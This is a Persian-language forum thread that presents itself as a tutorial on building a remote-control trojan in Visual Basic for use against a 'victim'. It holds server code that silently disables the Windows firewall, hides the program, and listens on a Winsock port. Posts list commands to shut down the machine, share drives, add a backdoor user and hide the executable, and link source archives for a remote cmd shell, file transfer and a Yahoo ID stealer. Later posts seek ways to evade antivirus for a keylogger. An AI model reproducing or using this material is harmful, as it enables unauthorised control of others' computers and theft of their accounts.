رتبه موضوع:
  • 25 رای - 2.64 میانگین
  • 1
  • 2
  • 3
  • 4
  • 5
تایپیک جامع تروجان نویسی +
#1
با سپاس از Amin_mansouri که به من اجازه داد تایپیک تروجان نویسی رو راه بندازمtajob

تروجان از دو فایل سرور و کلاینت ساخته شده که برنامه ی کلاینت برای شماس و برنامه سرور برای قربانیه

که از طریق این دو فایل باهم ارتباط برقرار میکنید مثلا ( چت کردن , کنترل سیستم قربانی , .............. )

خب حالا شروع میکنیم به نوشتن سورس تروجان اول از قسمت سرور شروع میکنیم.


وقتی قربانی برنامه ی سرور رو اجرا کنه برنامه یک پورت رو که به دلخواه شماس رو کامپیوتر هدف باز میکنه تا برنامه ی کلاینت شما به ایپی و پورت کانکت بشه منتها فایروال سیستم به باز شدن پورت گیر میده و ما با این کد فایروال سیستم رو خاموش میکنیم

Private Sub Form_Load()
Shell "netsh firewall set opmode disable", vbHide
End Sub

برای پنهان بودن برنامه از کدای زیر استفاده میکنیم


Private Sub Form_Load()
از کار انداختن فایروال ویندوز Shell "netsh firewall set opmode disable", vbHide
پنهان بودن برنامه Form1.Hide
پنهان بودن برنامه در تسک منیجر App.TaskVisible = False
end sub

حالا باید درون فرم یه کنترل winsock بزاریم و در قسمت فرم لود کد های زیر را بگزاریم

Me.Winsock1.LocalPort = 1010
Me.Winsock1.Listen

خط اول یک پورت را به وینسوک میشناسونیم مثلا 1010 و خط دووم یعنی پورت مورد نظررو باز کن و به آن گوش بده , حواستون باشه این کدا رو در فرم لود بزارید

حالا در درون فرم 2 تا Textbox و یک command درست کنید و caption دکمتونو send بزارید

در داخل دکمه ی ارسال این کد رو قرار بدید

Private Sub Command1_Click()
Me.Winsock1.SendData Me.Text1.Text
Me.Text1.Text = ""
End Sub
با این کد نوشته های داخل text1 به برنامه ی دووم یعنی کلاینت فرستاده میشه

و کد پایین نوشتهایی که کلاینت میفرسته درون text2 قرار میده


Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)
Dim myd As String
Me.Winsock1.GetData myd, vbString
Me.Text2.Text = myd
End Sub
کد پایین از خطا جلو گیری میکنه

If Me.Winsock1.State <> sckConnected Then Me.Winsock1.Close
Me.Winsock1.Accept requestID
End Sub


Private Sub Winsock1_Close()
Me.Winsock1.Close
Me.Winsock1.Listen
End Sub



حالا میرسیم به اینجا که وقتی قربانی سرور رو باز میکنه هیچی بالا نمیاد پس چجوری پیامی که ما براش میفرستیمو ببینه یا برامون پیام بفرسته

ما در برنامه ی کلاینتمون که در آینده یاد میدم 2 تا دکمه داریم یکی به اسم Show Chat و دومی Hide Chat

دکمه اول رو که بزنیم فرم chat برای قربانی باز میشه و میتونه با ما چت کنه یا ما با اون و دکمه ی دوم فرم چت رو قایم میکنه برای این کار شما این کد هارو به برنامه ی سرور اضافه کنید



Private Sub Text2_Change()
If Me.Text2.Text = "SHOW FORM" Then
Form1.Show
Me.Text2.Text = ""
End If
If Me.Text2.Text = "HIDE FORM" Then
Form1.Hide
Me.Text2.Text = ""
End If
End Sub

خب حالا دیگه سرور ما حاضره اینم سورسش



خب حالا دیگه رسیدیم به بخش کلاینت. چون کد های اساسی رو یاد دادم دیگه کد های کلاینتو یاد نمیدم سورسشو میزارم تا خودتون ببینید


فایل‌های پیوست
.rar   server_sourc.rar (اندازه 1.77 KB / تعداد دانلود: 57)
.rar   clint_sourc.rar (اندازه 2.12 KB / تعداد دانلود: 49)
پاسخ
#2
الان یه تروجان داریم که میتونیم به وسیله ی اون با قربانی چت کنیم ایشالا من این تروجانو پیشرفته تر میکنم جوری که بشه با command prompt قربانی کارکرد

برای وصل شدن به command prompt کدهای زیادی هست که ناقص هستند

مثلا یکیش همون استفاده از تابع shell هست که کاملا ناقصه البته سورس کامل ارتباط با cmd هست منتها اونم خیلی پیچیدس

این سورس رو با اینکه سادس ولی با خلاقیت درست کردم کارشم همون ارتباظ با cmd


فایل‌های پیوست
.rar   cmd_sourc.rar (اندازه 1.4 KB / تعداد دانلود: 45)
پاسخ
#3



دستوراتی که توی عکس میبینید رو میشه با استفاده از دستور شرطی IF در text1.change در برنامه ی server گذاشت
اینم سورسش


فایل‌های پیوست تصاویر بندانگشتی
   

.rar   Trojan.rar (اندازه 3.14 KB / تعداد دانلود: 29)
پاسخ
#4
بچه ها از کدای زیر برای تروجان استفاده کنید جالبه


Kill patch برای پاک کردن فایل یا فولدر

این کد کامپیوترو خاموش میکنه Shell Shutdown -s
Shell Shutdown -r این کد کامپیوترو ریستارت میکنه
ُShell Shutdown -l این کد کامپیوترو logoff میکنه


Shell net share boof=DriveName این دستور درایو موردنظرو تو کامپیوتر share میکنه.
Shell net user boof 1234 /add این دستور در کامپیوتر یه یوزر به اسم بوف با پسورد 1234 ایجاد میکنه


http://www.parsicoders.com/attachment.php?aid=284 البته با این سورس کد میتونید یوزر مخفی ایجاد کنید


با کد پایین میتونید مکان موس رو عوض کنید

Private Declare Function SetCursorPos Lib "user32" (ByVal x As Long, ByVal y As Long) As Long

SetCursorPos 0, 0
SetCursorPos 1151, 0


SetAttr "c:\trojan.exe", vbhidden + vbsystem این کد برنامه رو هیدن میکنه بصورت سیستمی





پاسخ
#5
دیگه فقط مونده تبادل اطلاعات بین دو کامپیوتر یا همون FTP یه سورس براتون میزارم

اگه چیزه جدیدیم پیدا کردم پست میدم , اگرم سوال داشتین در خدمتم.


فایل‌های پیوست
.rar   FTP.rar (اندازه 16.9 KB / تعداد دانلود: 39)
پاسخ
#6
اینم یه سورس خیلی کاربردی با این سورس میتونید آیدی هایی که قربانی به یاهو لاگین شده پیدا کنید سورسش ساده نوشتم خیلی ابتدایی , تازه بدرد ویروس نویساهم میخوره


فایل‌های پیوست
.rar   IDYahoo.rar (اندازه 4.87 KB / تعداد دانلود: 37)
راه در جهان یکیست و آن راه راستیست

                      (زرتشت)
پاسخ
#7
باسپاس از پست مفیدتون سوالی داشتم اکثر ویروس کش به کیلاگر گیر میده و کلید های تایپ شده راهی روشی سورسی هست که آنتی ویروس گیر نده یا غیر فعال بشه
پاسخ
#8
کسی نبوددددد
پاسخ
#9
درود
اکثر انتی ویروس ها به کرم های گیر میدن که کپی شده باشه
یعنی یه سورس کیلاگر توی اینترنت باشه شما بیایی واسه خودت کنی
تکنیک برنامه نویسی روش های نوشتن مهمه که باید با نحوه اسکن کردن انتی ها اشنا بشی
و بتونی روش های ابداع کنی که انتی دور بزنی
 
در صورتی که سوال دارید و سوالتون مختصر هست با شماره 09120642214 میتونید تماس بگیرید.
کسانی که دوست دارن در کانال فروشگاه ما و یا کانال انجمن عضو بشن یک پیامک در تلگرام برای من بفرستید که عضوشون میکنم.

ادرس فروشگاه :

http://www.amshop.ir



ای ام شاپ را در اینستگرام دنبال کنید

ای ام شاپ رو در کانال تلگرام دنبال کنید



This forum uses Lukasz Tkacz MyBB addons.
پاسخ
#10
منظور بنده هم همین بود از چه روشی استفاده کنیم برای کد نویسی ؟
پاسخ


موضوعات مشابه ...
موضوع نویسنده پاسخ بازدید آخرین ارسال
  سوکت نویسی winsock gachboy 1 1,637 12-23-2012، 03:13 PM
آخرین ارسال: Amin_Mansouri
  تایپیک ترفندهای ویژوال بیسیک alakimalaki 5 4,646 09-29-2012، 12:42 AM
آخرین ارسال: alakimalaki

پرش به انجمن:


کاربران در حال بازدید این موضوع: 1 مهمان
<------> <____> <<<<----------------->>>> <<<<--->>>>>
This forum uses Lukasz Tkacz MyBB addons.